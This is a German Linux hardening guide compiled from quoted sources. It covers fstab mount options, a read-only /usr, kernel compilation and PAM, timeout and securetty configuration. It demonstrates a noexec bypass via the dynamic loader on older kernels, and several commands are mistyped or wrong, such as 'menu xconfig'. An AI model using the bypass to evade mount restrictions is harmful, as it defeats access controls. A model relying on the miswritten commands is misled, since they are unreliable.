?) Dabei gehen wir auf dieser Webseite als Erstes bereits auf das Konfigurieren ein, gefolgt vom Aktualisieren, Partitionieren und Vollverschlüsseln usw.. Alternativ: Jemand ist so freundlich und spielt mittels Befehl dd bereits alles vorinstalliert (und möglichst aktualisiert) aufs Medium (SSD (sdx), Festplatte (S-ATA: sdx oder IDE: hdx), USB-Speicherstift, CD/DVD, ...) auf: jede Menge Zeit gespart (Prozessor-Architektur (x86_64, i686, ...) beachten und /etc/X11/xorg.conf zunächst auf vesa bzw. fb setzen)! Der geniale Allround-Befehl zum Spiegeln (Mirror) lautet (bzw. ä,hnlich): "dd if=/dev/sda of=/dev/sdb". Mit sdd anstelle dd wird auch ein Fortschrittsbalken angezeigt. Editor im folgenden: nano Partitionen auf die richtige Art einhängen Wenn Sie ein Ext-Dateisystem (ext2, ext3 oder ext4) einhängen, können Sie verschiedene Optionen mit dem mount-Befehl oder in /etc/fstab verwenden. Dies ist zum Beispiel mein fstab-Eintrag für meine /tmp-Partition: /dev/hda7 /tmp ext2 defaults,nosuid,noexec,nodev 0 2 Achten Sie auf den Abschnitt mit den Optionen. Die Option nosuid ignoriert komplett alle setuid- und setgid-Bits, während noexec das Ausführen von Programmen unterhalb des Einhängepunkts verbietet und nodev Gerätedateien ignoriert. Das hört sich toll an, aber: nosuid ist nur auf ext2 oder ext3-Dateisysteme anwendbar und kann leicht umgangen werden. Die Option noexec, die insbesonders für die Home- und temporären Partitionen verhindert, dass Programme ausgeführt werden können, ließ sich in früheren Kernelversionen leicht umgehen: alex@joker:/tmp# mount | grep tmp /dev/hda7 on /tmp type ext2 (rw,noexec,nosuid,nodev) alex@joker:/tmp# ./date bash: ./date: Keine Berechtigung alex@joker:/tmp# /lib/ld-linux.so.2 ./date So 3. Dec 17:49:23 CET 2000 Neuere Versionen des Kernels verarbeiten aber die Option noexec richtig: angrist:/tmp# mount | grep /tmp /dev/hda3 on /tmp type ext3 (rw,noexec,nosuid,nodev) angrist:/tmp# ./date bash: ./tmp: Keine Berechtigung angrist:/tmp# /lib/ld-linux.so.2 ./date ./date: error while loading shared libraries: ./date: failed to map segment from shared object: Operation not permitted However, many script kiddies have exploits which try to create and execute files in /tmp. If they do not have a clue, they will fall into this pit. In other words, a user cannot be tricked into executing a trojanized binary in /tmp e.g. when /tmp is accidentally added into the local PATH. Entscheidender Vorteil von noexec: Potentielle "Wirtszellen" von Viren (ausführbare Dateien, darunter Wirtsdateien) bleiben absolut unwirksam! Viren können sich mit gesetzter Option noexec also gernerell nicht auf der Home-Partion verbreiten (während auf der Root-Partition bereits Zugriffsrechte chmod <=755 unter Eigentümer wie root die Verbeitung von Viren im Benutzermodus (usermode) verhindern)! Seien Sie sich auch bewusst, dass manche Skripte darauf aufbauen, dass /tmp ausführbare Rechte hat. Bemerkenswerterweise hatte (oder hat?) Debconf Probleme bei dieser Sache, weitere Informationen enthält Fehler 116448. Nachfolgend ein gründlicheres Beispiel. Eine Anmerkung dazu: /var könnte auch noexec enthalten, aber manche Software [26] verwahrt ihre Programme unterhalb von /var. Dasselbe gilt für die Option nosuid. /dev/sda6 /usr ext3 defaults, ro, nodev 0 2 /dev/sda12 /usr/share ext3 defaults, ro, nodev, nosuid 0 2 /dev/sda7 /var ext3 defaults, nodev, usrquota, grpquota 0 2 /dev/sda8 /tmp ext3 defaults, nodev, nosuid, noexec, usrquota, grpquota 0 2 /dev/sda9 /var/tmp ext3 defaults, nodev, nosuid, noexec, usrquota, grpquota 0 2 /dev/sda10 /var/log ext3 defaults,nodev, nosuid, noexec 0 2 /dev/sda11 /var/account ext3 defaults, nodev, nosuid, noexec 0 2 /dev/sda13 /home ext3 rw, nosuid, nodev, exec, auto, nouser, async, usrquota, grpquota 0 2 /dev/fd0 /mnt/fd0 ext3 defaults, users, nodev, nosuid, noexec 0 0 /dev/fd0 /mnt/floppy vfat defaults, users, nodev, nosuid, noexec 0 0 /dev/hda /mnt/cdrom iso9660 ro, users, nodev, nosuid, noexec 0 0 https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Unser konkreter Vorschlag für die Geräte-Konfigurationsdatei /etc/fstab und das Aktualisieren: noch weiter unten im Folgenden! Listing: Linux-Sicherheitsmeldungen ab Jahr 2000 auf PRO-LINUX.de Nachstehend finden Sie alle aktuellen Sicherheitsmeldungen der wichtigsten Distributionen mit Angabe der Distribution, des Veröffentlichungsdatums und der behandelten Sicherheitslücke https://www.pro-linux.de/sicherheit/1/1/1.html Aktuelle LWN.net-Webseiten für Sicherheit Here are the most recent LWN.net security pages, with a comprehensive roundup of a week´s worth security-related information. Date Contents Apr 12, 2017 Network security in the microservice environment; Two Project Zero reports; .. . Apr 05, 2017 ARM pointer authentication; Quotes; Exploiting Broadcom WiFi; ... Mar 29, 2017 refcount_t meets the network stack; Quotes; ... Mar 22, 2017 Inline encryption support for block devices; Shim review; .. . Mar 15, 2017 A kernel TEE party; Quotes; Struts 2 vulnerability; ... Mar 08, 2017 A new process for CVE assignment; Smart TV bugging quotes; Threat modeling ... Mar 01, 2017 The case of the prematurely freed SKB; SHA-1 collision and fallout; ... Feb 22, 2017 The case against password hashers; New vulnerabilities in dropbear, kernel, nagios-core, qemu, ... Feb 15, 2017 A look at password managers; New vulnerabilities in kernel, libevent, mysql, php, ... Feb 08, 2017 Reliably generating good passwords; New vulnerabilities in epiphany, graphicsmagick, gstreamer (and plugins), spice, ... Feb 01, 2017 The Internet of scary things; New vulnerabilities in ansible, chromium, kernel, mozilla, ... Jan 25, 2017 Security training for everyone; New vulnerabilities in fedmsg, firejail, java, systemd, ... Jan 18, 2017 Ansible and CVE-2016-9587; New vulnerabilities in bind, docker, qemu, webkit2gtk, ... Jan 11, 2017 SipHash in the kernel; New vulnerabilities in kernel, kopete, syncthing, webkit2gtk, ... Jan 04, 2017 Fuzzing open source; New vulnerabilities in bash, httpd, kernel, openssh, ... Dec 22, 2016 OWASP ModSecurity Core Rule Set 3.0; New vulnerabilities in apport, kernel, libupnp, samba, ... Dec 14, 2016 ModSecurity for web-application firewalls; New vulnerabilities in jasper, kernel, mozilla, roundcube, ... Dec 07, 2016 Locking down module parameters; New vulnerabilities in chromium, firefox, kernel, xen, ... Nov 30, 2016 Django debates user tracking; New vulnerabilities in drupal, firefox, kernel, ntp, ... Nov 16, 2016 Reference-count protection in the kernel; New vulnerabilities in chromium, firefox, kernel, sudo, ... https://lwn.net/Security/ Separate usr-Partition: /usr auf nur-lesend setzen Wenn Sie (über /etc/fstab) auf /usr nur lesenden Zugriff erlauben, werden Sie nicht in der Lage sein, neue Pakete auf Ihrem Debian-GNU/Linux-System zu installieren. Sie werden es erst mit Schreibzugriff erneut einhängen müssen, die Pakete installieren und dann wieder nur mit lesendem Zugriff einhängen. Apt kann so konfiguriert werden, dass Befehle vor und nach dem Installieren von Paketen ausgeführt werden. Daher müssen Sie es passend konfigurieren. Dafür müssen Sie /etc/apt/apt.conf bearbeiten und Folgendes einfügen: DPkg { Pre-Invoke { "mount /usr -o remount,rw" }; Post-Invoke { "mount /usr -o remount,ro" }; }; ( Das Anlegen einer separaten usr-Partition z.B. nach Einrichtung einer verschlüsselten Root-Partition wird hingegen nicht empfohlen, Anm., Gooken. ) Beachten Sie, dass das Post-Invoke mit der Fehlermeldung "/usr ist belegt" scheitern kann. Dies passiert vorwiegend, wenn Sie eine Datei benutzen, die aktualisiert wurde. Sie können diese Programme finden, indem Sie Folgendes ausführen: # lsof +L1 Halten Sie diese Programme an oder starten Sie sie erneut und rufen dann Post-Invoke manuell auf. Achtung! Das bedeutet, dass Sie wahrscheinlich jedes Mal Ihre Sitzung von X (falls Sie eine laufen haben) neu starten müssen, wenn Sie ein größeres Upgrade Ihres Systems durchführen. Sie müssen entscheiden, ob ein nur lesbares /usr zu Ihrem System passt. Vergleichen Sie auch diese discussion on debian-devel about read-only /usr. Wir beabsichtigen im Kommenden, das System einschließlich Root-Partition (und USB-Speicherstifte und SD-Karten) hochwirksam mit LUKS vollzuverschlüsseln (FSE) und im Gegensatz zu /usr die gesamte Root-Partition wie die Home-Partition anschließend unbeschreibbar auf "read-only" (ro) zu setzen. Die Möglichkeit über /usr bzw. die separate usr-Partition sei dabei natürlich vorbehalten. Update mit dem Kernel-Binary (rpm) oder Konfiguration, Patchen, Kompiliieren des Kernel-Source (rpm.src) Wir gehen von der Installation einer rpm-basierten Linux-Distribution auf einem Laufwerk/Speichermedium aus, mit Blick auf unsere Sektion für Updates vorzugsweise RedHat, CentOS oder Scientific Linux, Almalinux, Fedora Core, PCLinuxOS, ROSA, Mageia oder Mandriva. Nun gibt es zwei Möglichkeiten: Entweder man installiert einen vorkonfigurierten Kernel ("rpm -i --force kernel-....rpm") oder schneidert ihn selbst maß (Kernel-Konfiguration und Compilierung). Im zweiten Fall ist Folgendes zu tun (die Anleitung stammt aus unserer Update-Sektion und erfolgt daher in englischer Sprache): Konfiguration, Patch, Kompilieren: Download und install vom Kernel angeforderte Pakete rpm, danach die Kernel-Quellen. Installiere oder entpacke nach /usr/src manuell mit dem Befehl "tar -xvjf kernel-source-package", rpm oder graphisch mit File-Roller. Ein neues Verzeichnis namens "linux-kernelversion-xxx" oder "kernel-source-xxx" wird innerhalb /usr/src erzeugt. Linke dieses Verzeichnis mit einem Link (Link-Datei) namens linux: "ln -sf linux-xxx linux" resp. "ln -sf kernel-source-xxx linux". Wechsle in dieses Verzeichnis linux linux resp. linux-xxx bzw. kernel-source-xxxx and führe den Befehl "menu oldconfig". aus. Damit wird die Datei .config zum Konfigurierren des Kernels erzeugt. Führe nun "menu xconfig" ooder "menu gconfig" oder "make menuconfig" aus und konfiguriere die benötigten Kernel-Treiber usw. duch Setzen auf (CC) für die benötigten, (CC MM) für als Module vom Kernel und per Befehl wie modprobe einbindbaren und das leere Feld für solche mit Verzicht. Für mit dracut ermöglichtes FSE (Full System Encryption einschließlich verschlüsselter Root-Partition) sind zwei Optionen zu ermöglichen, was in kernel-desktop (mdv2011), aber nicht kernel (el6):der Fall ist. Kernel: Empfohlen sei kernel 5 und 4 (in unserem Beispiel kernel 5.4.249 (pclos2023) bzw. 4.20.13 (pclos) mit glibc (el8, pclos) oder kernel (rosa2016.1, el8, el7, el6: mit upstart (el6)), mkinitrd (pclos, rosa, mga2), nash (pclos, rosa, mga2) und dracut (mga6, Version 044, el6: Version 004 (leads into manual LUKS-password request even in the case of existing password-key-file!, mdv2011: Version 008)) bzw. noch der Kernel 2.6.39.4). Um Fehlermeldungen beim Booten zu umgehen, verlangt glibc (pclos, el8) nur noch die Entfernung der Zeile LC_TIME=de_DE.UTF-8 aus /etc/sysconfig/i18n ! Gegebenenfalls sind noch die locales (pclos, mga7, mga6) nachzuinstallieren. Alle Patches für 2.6.39.4-5.1 bis heute sind im Internet von http://repository.timesys.com/buildsources/k/kernel/kernel-2.6.39/ verfügbar, i.a. aber von kernel.org: compiler-gcc5, add-timesys-bootlogo, dirty-cow, lantronix-ts1, no-setlocalversion, no-unused-but-set-variable, revert-nfsroot, timeconst.pl-eliminate-perl-warning, ltrx-image-rom und yaffs2. Patch: patch (el6, fc27, mdv2010.1) muss installiert sein. Gebe danach folgenden Befehl ein: "patch -p1 < ../patchname.patch " Zwei Möglichkeiten: 1) Bau des kernel-Paket-rpm aus den Quellen nach Anwendung der Patches: Konfiguriere die aus den Quellen stammende spec-Datei (Datei vom Typ spec), indem angewandte Patches eingetragen bzw. auskommentiert werden: https://www.howtoforge.de/anleitung/wie-man-einen-kernel-kompiliert-auf-fedora/. Führe dann den Befehl "rpm -ba" anstelle "rpmbuild -ba" kernel-xxx.spec aus, um das Kernel-Binärpaket zu erzeugen. 2) Konfiguration der Quellen und Kompilieren: Kopiere die Date .config ausgehend von /usr/src nach include/config/auto.conf Rufe den Befehl "menu xconfig" or "menu gconfig" oder "make menuconfig" auf und konfiguriere die Treiber und alles Benötigte (CC), als Module Benötigtes (CC MM) und solches mit Verzicht auf Einbindung, oder konfiguriere anhand einer mit "make oldconfig" vorgegebenen Konfiguration. Für FSE (full system encryption) mit dracut sollten zwei Optionen ermöglicht (aktiviert) werden: innerhalb des ersten Eintrags"General Setup"enable "Initial-RAM-filesystem and RAM-disk-support" und in "general drivers" "Maintain a devtmpfs at /dev/ with subitem" zum Automount von devtmpfs in /dev nach dem Mount (Einbinden) der Root-(Wurzel-)Partition". Im Zweifelsfall setze man den Wert MM (x), (*), (M) oder (CC), um ein Modul immerzu, auch unnachgefragt, zu laden (A) oder (CC MM), (MM), um es auf Anfrage hin automatisch oder manuell nachzuladen oder (-) oder ( ): zum Verzicht auf das Modul. kernel-2.6.39-40.src.rpm, Beispiel: Um den Betrieb einer iptables-basierten Firewall zu ermöglichen, sollten bestimmte Module eingebunden werden. Öffne ein Terminal und gebe eines der folgenden Kommandos ein: make menuconfig für die graphische Konfiguration mit Dialog-GUI, male xconfig für tk-GUI oder make gconfig für GTK oder make config Wähle nun Folgendes aus: Networking options ---> [*] Network packet filtering (replaces ipchains) IP: Netfilter Configuration ---> . (M) Userspace queueing via NETLINK (EXPERIMENTAL) (M) IP tables support (required for filtering/masq/NAT) (M) limit match support (M) MAC address match support (M) netfilter MARK match support (M) Multiple port match support (M) TOS match support (M) Connection state match support (M) Unclean match support (EXPERIMENTAL) (M) Owner match support (EXPERIMENTAL) (M) Packet filtering (M) REJECT target support (M) MIRROR target support (EXPERIMENTAL) . (M) Packet mangling (M) TOS target support (M) MARK target support (M) LOG target support (M) ipchains (2.2-style) support (M) ipfwadm (2.0-style) support denke auch an viele weitere Optionen (Module) und speichere die Konfiguration schließlich ab. kernel-firmware (binary blobs within /lib/firmware, rpm kernel-firmware (around 250 MB) and/or kernel-firmware-extra ): For kernels before 4.18: KERNEL Enable support for Linux firmware Device Drivers ---> Generic Driver Options ---> -*- Userspace firmware loading support [*] Include in-kernel firmware blobs in kernel binary (/lib/firmware) Firmware blobs root directory For kernels beginning with 4.18: KERNEL Enable support for Linux firmware Device Drivers ---> Generic Driver Options ---> Firmware loader ---> -*- Firmware loading facility () Build named firmware blobs into the kernel binary (/lib/firmware) Firmware blobs root directory Führe nun die Komplierung vorbereitenden Befehle aus: "make dep && make clean && make mrproper" . Gebe die Kernel-Version gleich am Anfang innerhalb makefile an vorgesehener Stelle an. Patchen: patch -p1 < ../any_patch.patch make -i rpm (Erzeuge eines binären (kompilierten) Kernel-Pakets (rpm), benötige Zeit: ca. vier Stunden), alternativ make all # oder make dep (Berücksichtigung der Abhängigkeiten) make clean (Löschen nicht mehr benötigter, alter Daten) make bzImage (Erzeugung des Kernel-Kerns vmlinuz, welcher sich später im Boot-Verzeichnis /boot finden sollte. Hierfür ist das Erzeugnis namens Datei bzImage-Versionsnummer in vmlinuz-Versionsnummer umzubennenen, benötigte Zeit: um die 30 Minuten) oder make bzImage &,& make modules && make modules_install für alles in einem, einschlie&zlig;lich der Erzeugung und Installation der Kernel-Module /in /lib/modules/kernel-versionsnummer. Kopiere das erzeugte bzImage (Datei) namens bzImage-Kernelversion aus einem der Unterverzeichnisse von /usr/src ( notfalls mit Befehl find suchen: "find /usr/src -maxdepth 6 -name bzImage*" ) in das Boot-Verzeichnis /boot, nachdem die Datei bzImage* in vmlinuz-Kernelversion umbenannt worden ist. Starte den Befel mkinitrd, besser dracut, um das Initial-Ram-Disk-Archive initrd (initrd-Kernel-Versionsnummer), bei dracut initramfs (initramfs-Kernel-Versionsnummer), innerhalb des Boot-Verzeichnis /boot zu erzeugen ("dracut -f /boot/initramfs-Kernel-Vesionsnummer Kernel-Versionsnummer". Die Versionsnummern verhindern Überschreiben. dracut sollte dafür in /etc/dracut.conf vorher bestens konfiguiert sein, um bestimmte Module einzubinden, eine Konfigurationsdatei dracut.conf von dracut geben wir weiter unten an. Beachte, dass sehr viele, auch neuere Versionen von dracut überhaupt nicht funktionieren (wir wählten dracut (008, mdv2011))! ). Beim Kopieren bzw. Erzeugen in /boot sollte man etwaige alte Kernel-, initrd- bzw. initramfs-Versionen aus dem Verzeichnis /boot keinesfalls überschreiben! Konfiguriere abschließend den Boot-Manager, bei uns namens Grub (grub oder grub2), in /boot/grub/menu.lst (grub1) entsprechend, editiere Zeilenumbrüche verhindernd /boot/grub/menu.lst (am besten mit dem Editor nano) und tausche die vmlinuz-kernel-versionen namentlich aus, bzw. trage sie in einem eigenen neuen Abschnitt für den neuen Kernel neu ein, und trage dort auch die neue (Datei) initramfs bzw. initrd (einschl. zugehöriger Kernel-Versionsnummer) namentlich an der Stelle für initrd ein. done. Starte (boote) das System neu (System-Neustart). Klappt alles, kann man alte Kernel-Versionen austragen (löschen), falls nicht, boote eine alte Kernel-Version und lösche die neu erzeugte. Abmelden von untätigen Benutzern Untätige (idle) Benutzer stellen für gewöhnlich ein Sicherheitsproblem dar. Ein Benutzer kann untätig sein, da er Mittagessen ist, oder weil eine Verbindung aus der Ferne hängen blieb und nicht wieder hergestellt wurde. Unabhängig von den Gründen können untätige Benutzer zu einer Kompromittierung führen: weil die Konsole des Benutzers vielleicht nicht verriegelt ist und damit ein Eindringling darauf zugreifen kann. because an attacker might be able to re-attach to a closed network connection and send commands to the remote shell (this is fairly easy if the remote shell is not encrypted as in the case of telnet). In einige Systeme in der Ferne wurde sogar schon durch ein untätiges (und abgelöstes) Screen eingedrungen. Die automatische Trennung von untätigen Benutzern ist gewöhnlich ein Teil der lokalen Sicherheitsrichtlinie, die durchgesetzt werden muss. Es gibt mehrere Arten, dies zu erreichen: If bash is the user shell, a system administrator can set a default TMOUT value (see bash(1)) which will make the shell automatically log off remote idle users. Note that it must be set with the -o option or users will be able to change (or unset) it. Installieren Sie Timeoutd und konfigurieren Sie /etc/timeouts passend zu Ihren lokalen Sicherheitsrichtlinien. Der Daemon achtet auf untätige Benutzer und beendet entsprechend ihre Shells. Installieren Sie Autolog und richten Sie es so ein, dass es untätige Benutzer entfernt. Vorzugswürdige Methoden sind die Daemonen Timeoutd oder Autolog, da letzten Endes die Benutzer ihre Standardshell ändern können oder zu einer anderen (unbeschränkten) Shell wechseln können, nachdem sie ihre Standardshell gestartet haben. https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Linux: TMOUT To Automatically Log Users Out last updated May 18, 2011 in Categories BASH Shell, Linux How do I auto Logout my shell user in Linux after certain minutes of inactivity? Linux bash shell allows you to define the TMOUT environment variable. Set TMOUT to automatically log users out after a period of inactivity. The value is defined in seconds. For example, export TMOUT=120 The above command will implement a 2 minute idle time-out for the default /bin/bash shell. You can edit your ~/.bash_profile, ~/.bashrc or /etc/profile file as follows to define a 5 minute idle time out: # set a 5 min timeout policy for bash shell TMOUT=300 readonly TMOUT export TMOUT Save and close the file. The readonly command is used to make variables and functions readonly i.e. you user cannot change the value of variable called TMOUT. How Do I Disable TMOUT? To disable auto-logout, just set the TMOUT to zero or unset it as follows: $ export TMOUT=0 or $ unset TMOUT Please note that readonly variable can only be disabled by root in /etc/profile or ~/.bash_profile. https://www.cyberciti.biz/faq/linux-tmout-shell-autologout-variable/ Oder füge SHELL_TIMEOUT (TMOUT) einen Wert in /etc/security/msec/level.secure zu: SHELL_TIMEOUT=300 /etc/pam.d/system-auth ( in auf unserer Plattform getesteter Form ): #%PAM-1.0 auth required pam_env.so auth sufficient pam_unix.so try_first_pass likeauth auth required pam_deny.so auth requisite pam_succeed_if.so uid >= 500 quiet auth required pam_tally2.so deny=3 onerr=fail unlock_time=60 account sufficient pam_tcb.so shadow account required pam_deny.so account sufficient pam_succeed_if.so uid < 500 quiet account required pam_tally2.so per_user password required pam_cracklib.so try_first_pass retry=3 minlen=6 dcredit=1 ucredit=0 password sufficient pam_unix.so try_first_pass use_authtok sha512 shadow remember=2 password required pam_deny.so session optional pam_keyinit.so revoke session required pam_limits.so session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid session required pam_unix.so Mehr über pam-Module: http://www.linuxdevcenter.com/pub/a/linux/2001/09/27/pamintro.html?page=2 https://linux.die.net/man/5/pam.d ... Wenn Sie PAM benutzen, können Sie auch andere Änderungen am Login-Prozess, die auch Einschränkungen für einzelne Benutzer oder Gruppen zu bestimmten Zeiten enthalten können, durch Konfiguration der Datei /etc/pam.d/login vornehmen. Eine interessante Eigenschaft, die man auch abschalten kann, ist die Möglichkeit, sich mit einem leeren Passwort (Null-Passwort) anzumelden. Diese Eigenschaft kann eingeschränkt werden, indem Sie nullok aus folgender Zeile entfernen: auth required pam_unix.so nullok Unsere /etc/pam.d/login: %PAM-1.0 auth required pam-securetty.so auth required pam_tally2.so deny=3 even_deny_root unlock_time=2400 auth include system-auth account required pam_nologin.so account include system-auth password include system-auth # pam_selinux.so close should be the first session rule session required pam_selinux.so close session required pam_loginuid.so session optional pam_console.so # pam_selinux.so open should only be followed by sessions to be executed in the user context session required pam_selinux.so open session required pam_namespace.so session optional pam_keyinit.so force revoke session include system-auth -session optional pam_ck_connector.so In securetty entfernen Sie oder fügen Sie Terminals hinzu, auf denen sich Root anmelden darf. Falls Sie nur lokalen Zugang zur Konsole erlauben wollen, benötigen Sie console, ttyX und vc/X (falls Sie die devfs-Schnittstelle verwenden). Sie sollten auch ttySX hinzufügen, wenn Sie eine serielle Konsole für den lokalen Zugang verwenden (wobei X eine ganze Zahl ist; es kann wünschenswert sein, mehrere Instanzen zu verwenden). Die Standardeinstellung in Wheezy beinhaltet viele tty-Konsolen, serielle Schnittstellen und virtuelle Konsolen sowie den X-Server und das console-Gerät. Sie können das ohne Probleme anpassen, wenn Sie nicht derartige viele Konsolen benutzen. Sie können die Anzahl der Konsolen und Schnittstellen in /etc/inittab überprüfen. Weiterführende Informationen zu Terminal-Schnittstellen finden Sie im Text-Terminal-HOWTO. https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html The primary entry types and their affects are as follows: If /etc/securetty doesn´t exist, root is allowed to login from any tty If /etc/securetty exist and is empty, root access will be restricted to single user mode or programs that are not restricted by pam_securetty (i.e. su, sudo, ssh, scp, sftp) if you are using devfs (a deprecated filesystem for handling /dev), adding entries of the form vc/[0-9]* will permit root login from the given virtual console number if you are using udev (for dynamic device management and replacement for devfs), adding entries of the form tty[0-9]* will permit root login from the given virtual console number listing console in securetty, normally has no effect since /dev/console points to the current console and is normally only used as the tty filename in single user mode, which is unaffected by /etc/securetty adding entries like pts/[0-9]* will allow programs that use pseudo-terminals (pty) and pam_securetty to login into root assuming the allocated pty is one of the ones listed; it´s normally a good idea not to include these entries because it´s a security risk; it would allow, for instance, someone to login into root via telenet, which sends passwords in plaintext (note that pts/[0-9]* is the format for udev which is used in RHEL 5.5; it will be different if using devfs or some other form of device management) For single user mode, /etc/securetty is not consulted because the sulogin is used instead of login. See the sulogin man page for more info. Also you can change the login program used in /etc/inittab for each runlevel. https://unix.stackexchange.com/questions/41840/effect-of-entries-in-etc-securetty Ein paar weitere Möglichkeiten mit PAM: Verschlüssele Passwörter nicht mit DES (anfällig für brute-force-Dekodierungen). Setze Limits für alle Benutzer, so dass sie keine Denial-of-Service-Angriffe starten (Anzahl der Prozesse, Speichergröße, etc). Ermögliche stets Shadow-Passwörter (aus /etc/shadow) Erlaube Benutzern nur den Login zu bestimmten Zeiten von bestimmten Orten. In kurzer Zeit lassen sich viele Angriffe abwehren, ehe sie auftauchen. Benutze z.B. PAM, um den systemweien Zugriff auf .rhosts-files im Home-Verzeichnis auf folgende Art in /etc/pam.d/rlogin zu verhindern: # # Verbiete Benutzern (veraltertes) rsh, rlogin und rexec # login auth required pam_rhosts_auth.so no_rhosts Quelle: http://www.tldp.org/HOWTO/Security-HOWTO/password-security.html#AEN698 pam_tcb.so: Wechsel von shadow-Passwörtern nach tcb in Linux Für ein noch sicheres Linux-Passwort-System, die Migration von shadow-Passwörtern nach tcb ist die wenig Mühe wert. Vincent Danen erklärt, was zu tun ist. "Shadow passwords have been a de facto standard with Linux distributions for years and as well as the use of md5 passwords. However, there are drawbacks to using the traditional shadow password method, and even md5 is not as secure as it used to be. One drawback to the shadow password file is that any application that requires looking up a single shadow password (i.e., your password) also can look at everyone else´s shadow passwords, which means that any compromised tool that can read the shadow file will be able to obtain everyone´s shadow password." Installiere zuerst pam (bei uns (pclos)), u.a. mit pam-tcb (pclos) und imfalle einer Verschlüsselung mit Blowfish das Paket bcrypt. Nun folge der Anleitung und Quelle: https://www.techrepublic.com/article/migrating-from-shadow-passwords-to-tcb-in-linux/ alternativ: Migrating to tcb, http://www.opennet.ru/man.shtml?topic=tcb_convert&category=8&russian=2 Von der Verschlüsselung mit Blowfish und dem Entfernen der shadow-Dateien haben wir im Folgenden noch abgesehen. Unsere geänderte Datei /etc/pam.d/system-auth lautet nach Durchführung der Schritte: #%PAM-1.0 auth required pam_env.so auth sufficient pam_tcb.so auth required pam_deny.so auth requisite pam_succeed_if.so uid >= 500 quiet auth required pam_tally2.so deny=3 onerr=fail unlock_time=1200 account sufficient pam_tcb.so shadow account required pam_deny.so account sufficient pam_succeed_if.so uid < 500 quiet account required pam_tally2.so per_user password required pam_cracklib.so try_first_pass retry=3 minlen=6 dcredit=1 ucredit=1 password sufficient pam_tcb.so use_authtok tcb write_to=tcb password required pam_deny.so session optional pam_mount.so session optional pam_keyinit.so revoke session required pam_limits.so session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid session required pam_tcb.so und /etc/pam.d/password-auth: #%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth required pam_tally2.so file=/var/log/tallylog deny=3 even_deny_root unlock_time=1200 auth sufficient pam_tcb.so auth required pam_deny.so account required pam_tcb.so password requisite pam_cracklib.so try_first_pass retry=3 type= password sufficient pam_tcb.so try_first_pass use_authtok sha512 shadow password required pam_deny.so session optional pam_keyinit.so revoke session required pam_limits.so session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid session required pam_tcb.so /etc/nsswitch.conf: # # /etc/nsswitch.conf # # An example Name Service Switch config file. This file should be # sorted with the most-used services at the beginning. # # The entry ´[NOTFOUND=return]´ means that the search for an # entry should stop if the search in the previous entry turned # up nothing. Note that if the search failed due to some other reason # (like no NIS server responding) then the search continues with the # next entry. # # Legal entries are: # # compat Use compatibility setup # nisplus or nis+ Use NIS+ (NIS version 3) # nis or yp Use NIS (NIS version 2), also called YP # dns Use DNS (Domain Name Service) # files Use the local files # db Use the local database (.db) files # [NOTFOUND=return] Stop searching if not found so far # # For more information, please read the nsswitch.conf.5 manual page. # passwd: files -root -ALL shadow: files -root -ALL group: files hosts: files [success=return] dns [success=return] networks: files services: -ALL protocols: -ALL rpc: -root -ALL ethers: -ALL netmasks: files netgroup: files publickey: files bootparams: files ipnodes: -ALL sendmailvars: -ALL automount: -root -ALL aliases: files Installation neuer Software kann diese mehr als wichtigen Einstellungen verändern. Überpüfen Sie diese Einstellungen von Zeit zu Zeit! Einzelheiten zu /etc/nsswitch.conf: https://docs.oracle.com/cd/E24841_01/html/820-2980/ipconfig-42.html Probiere auch eigenlich für tcb Vorgesehenes "shadow: tcb nisplus nis" und setze "nebenbei" außerdem die Reihenfolge für hosts: "hosts: files mdns4_minimal dns nis mdns4 wins" Ersetze auch in allen anderen /etc/pam.d/* pam_unix.so mit pam_tcb.so. Der Rechner läuft einmal mehr mausklick-schnell und sicher.. Benutzerkonto-Sperre While having strong passwords in place for user accounts can help thwart brute force attacks as mentioned previously in point 18 - Enforce strong passwords, this is only one way of slowing down this type of attack. A good indication of brute force attack is a user account that has failed to log in successfully multiple times within a short period of time, these sorts of actions should be blocked and reported. We can block these attacks by automatically locking out the account, either at the directory if in use or locally. The pam_tally2.so PAM module can be used to lock out local accounts after a set number of failures. To get this working I have added the below line to the /etc/pam.d/password-auth file. auth required pam_tally2.so file=/var/log/tallylog deny=3 even_deny_root unlock_time=1200 This will log all failures to the /var/log/tallylog file and lock out an account after 3 consecutive failures. By default it will not deny the root account however we can also lock out root by specifying even_deny_root (though this may not be required if you have disabled root access as per point 3 - Disable remote root access and point 4 - Disable root console access). The unlock time is the amount of seconds after a failed login attempt that an account will automatically unlock and become available again. Failed logins can be viewed as below, to view all failures simply remove the --user flag. [[email protected] ~]# pam_tally2 --user=bob Login Failures Latest failure From bob 4 08/21/15 19:38:23 localhost The failure count can be manually reset by appending -reset onto this command. pam_tally2 --user=bob --reset If a login is successful before the limit has been reached the failure count will reset to 0. For more details see the pam_tally2 manual page by typing ´man pam_tally2´. It´s worth noting that the manual page advises to configure this with the /etc/pam.d/login file, however I found that under CentOS 7 this did not work and needed to use the /etc/pam.d/password-auth file instead. I also tried using /etc/pam.d/system-auth which I found documented elsewhere but this also failed, so this may differ based on your operating system. You can also manually lock and unlock local user accounts rather than waiting for the failure limit to be reached. Lock the user account ‘bob´.https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/#4 Quelle: https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ Disable Root Console Access The previous step disables remote access for the root account, however it will still be possible for root to log in through any console device. Depending on the security of your console access you may wish to leave root access in place, otherwise it can be removed by clearing the /etc/securetty file as shown below. echo > /etc/securetty This file lists all devices that root is allowed to login to, the file must exist otherwise root will be allowed access through any communication device available whether that be console or other. With no devices listed in this file root access has been disabled. It is important to note that this does not prevent root from logging in remotely with SSH for instance, that must be disabled as outlined in point 3 - Disable remote root access above. Access to the console itself should also be secured, a physical console can be protected by the information covered in point 13 - Physical security. https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ Administrativen Fernzugriff verweigern /etc/security/access.conf sollte ebenfalls so verändert werden, dass ein Login aus der Ferne in ein administratives Konto nicht erlaubt wird. Auf diese Weise müssen Benutzer das Programm Su (oder Sudo) aufrufen, um Administratorenrechte zu bekommen, so dass es immer eine nachprüfbare Spur gibt. Folgende Zeile ist zur /etc/security/access.conf hinzufügen, in Debians 